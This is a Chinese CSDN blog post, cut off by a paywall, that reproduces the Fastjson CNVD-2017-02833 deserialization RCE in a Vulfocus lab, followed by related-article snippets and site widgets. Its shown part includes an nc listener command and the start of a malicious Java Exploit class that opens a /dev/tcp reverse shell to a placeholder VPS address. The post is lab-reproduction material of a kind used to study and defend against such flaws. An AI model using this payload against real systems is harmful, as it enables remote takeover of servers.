【安全攻防知识-9】Fastjson(CNVD-2017-02833)验证

最新推荐文章于 2024-03-10 17:06:04 发布
最新推荐文章于 2024-03-10 17:06:04 发布
阅读量759 收藏 1
点赞数
分类专栏: 内网渗透 WEB安全 文章标签: 信息安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_26579613/article/details/125523294
版权

1、登陆vulfocus,打开fastjson环境

Vulfocus 漏洞威胁分析平台

2、服务器配置

2.1 打开端口代理

nc -lvvp 1888

2.2  挂载恶意Java程序

首先,编写恶意EXP,命名 Exploit.class,其中x.x.x.x为vps地址,1888为LADP监听端口

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit{
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/1888;cat <&5 | while read line; do $line 2>&5 >&5;
最低0.47元/天 解锁文章
BridyWang
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Fastjson反序列化RCE漏洞复现—CNVD-2017-02833
afei001
10-10 794
fastjson是一款用Java语言编写的高性能功能完善的JSON库。可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定se
Struts 2.5.10.1(Struts 2.3.32)
03-09
struts-2.5.10.1和struts-2.3.32 官方发布最新版本 lib包,官方发布最新版本 lib包,可预防高危漏洞Apache struts2 S2-045远程代码执行漏洞(CNVD-2017-02474,对应CVE-2017-5638)风险预警
struts2代码执行漏洞
收集盒 Book box
06-28 578
刚刚@乌云-漏洞报告平台公布的struts2代码执行漏洞, 具体的漏洞说明地址 https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt  还是热乎的,我大概白话一下。 这个漏洞的级别很高,都升级修补一下。  影响版本是2.3.1和2.3.1之前的版本 解
vulfocus/fastjson-cnvd_2019_22238漏洞复现(docker)附问题解决方案
最新发布
weixin_63139305的博客
03-10 912
完整的复现过程,每一步的原理都很详细。使用vulhub的docker,没有使用在线的vulfocus因为连接太不稳定了
Fastjson反序列化审计及验证
二狗的博客
12-14 458
至此,Fastjson漏洞验证之旅已结束,通过DNSLog方式,我们证明了该地方存在Fastjson反序列化漏洞。在内网环境中,无法利用互联网的DNSlog进行漏洞验证。已确定了Fastjson版本存在问题,进一步寻找触发Fastjson的漏洞点。本项目引入的Fastjson版本为1.2.58,该版本存在反序列化漏洞。通过对各个页面的访问并抓包,找到propertyAddJson参数。这里我们优先结合方法一,方法二更适合get请求。字段中,点击发送数据包。方法,则这几处均存在反序列化。
fastjson 代码执行 (CNVD-2017-02833
qq_40646572的博客
05-08 865
fastjson
Fastjson <1.2.24远程代码执行(CNVD-2017-02833
weixin_43071873的博客
10-29 1701
Fastjson <1.2.24远程代码执行(CNVD-2017-02833 ) 漏洞详情 fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。 影响版本 fastjson <=1.2.24 漏洞利用 靶机:192.168.118.147:8090 kali docker搭建的漏洞环境 攻击机:192.168.118.1 win10 访问存在漏洞的页面,得到json格
gexin-rp-fastjson-1.0.0.1.jar
06-13
un push相关推送jar包文件,找了很久才找到,保存下,有需要的欢迎下载
fastjson-1.2.76.jar
06-29
fastjson-1.2.76.jar
fastjson-1.1.71.android.jar
07-09
fastjson-android是fastjson专门为android开发提取出来的一个精简的fastjson包,更适应android开发特点,序列化和反序列化操作简便。
fastjson-1.2.70.jar.zip
03-21
FastJsonjar包
fastjson-1.2.28-API文档-中英对照版.zip
04-08
赠送jar包:fastjson-1.2.28.jar; 赠送原API文档:fastjson-1.2.28-javadoc.jar; 赠送源代码:fastjson-1.2.28-sources.jar; 包含翻译后的API文档:fastjson-1.2.28-javadoc-API文档-中文(简体)-英语-对照版....
fastjson 代码执行 (CNVD-2017-02833)复现
YouthBelief的博客
10-29 2738
文章目录前言一、fastjson 代码执行 (CNVD-2017-02833)0x01 漏洞描述0x02 影响范围0x03 漏洞利用1.直接用rce工具0x04 漏洞修复总结 前言 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象 一、fastjson 代码执行 (CNVD-2017-02833) 0x01 漏洞描述 fastjson在解析json的过程中,支持使用@type字段来指定反序列化的类型,并调用该类的s
fastjson-cnvd-2017-02833漏洞复现 | Web漏洞挖掘班作业
Ms08067安全实验室
12-08 789
文章来源|MS08067 Web安全漏洞挖掘实战班课后作业本文作者:某学员A(Web漏洞挖掘实战班2期学员)一、漏洞概述fastjson在解析json的过程中,支持使用@type字段来指定...
FastJson解析
u010550007的博客
09-28 702
http://www.bejson.com/   JSON校验格式化工具 {"Information":[ { "address":xx ,"phone":xx } ,{ "address":xx, "phone": xx ,"cd": xx} ],"name":xx, "sex": xx } 从服务端那获取到一串Json数据,又臭又长,看着累,傻不拉几的我居然不懂得百度搜
Fastjson远程代码执行漏洞通告
爱国小白帽
05-28 2514
Fastjson远程代码执行漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年05月28日, 360CERT监测发现业内安全厂商发布了Fastjson远程代码执行漏洞的风险通告,漏洞等级:高危。 Fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。 Fastjson存在远程代码执行漏洞,autotype
Fastjson反序列化漏洞复现(实战案例)
qq_50854662的博客
04-18 1640
Fastjson反序列化漏洞复现(实战案例)
rocketmq-client4.4.0 依赖fastjson版本
09-28
RocketMQ-Client 4.4.0 依赖的 fastjson 版本是 1.2.62。RocketMQ 是一款开源的消息中间件,用于在分布式系统中实现高效、可靠和可扩展的消息传递。RocketMQ-Client 4.4.0 是 RocketMQ 的 Java 客户端,用于与 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值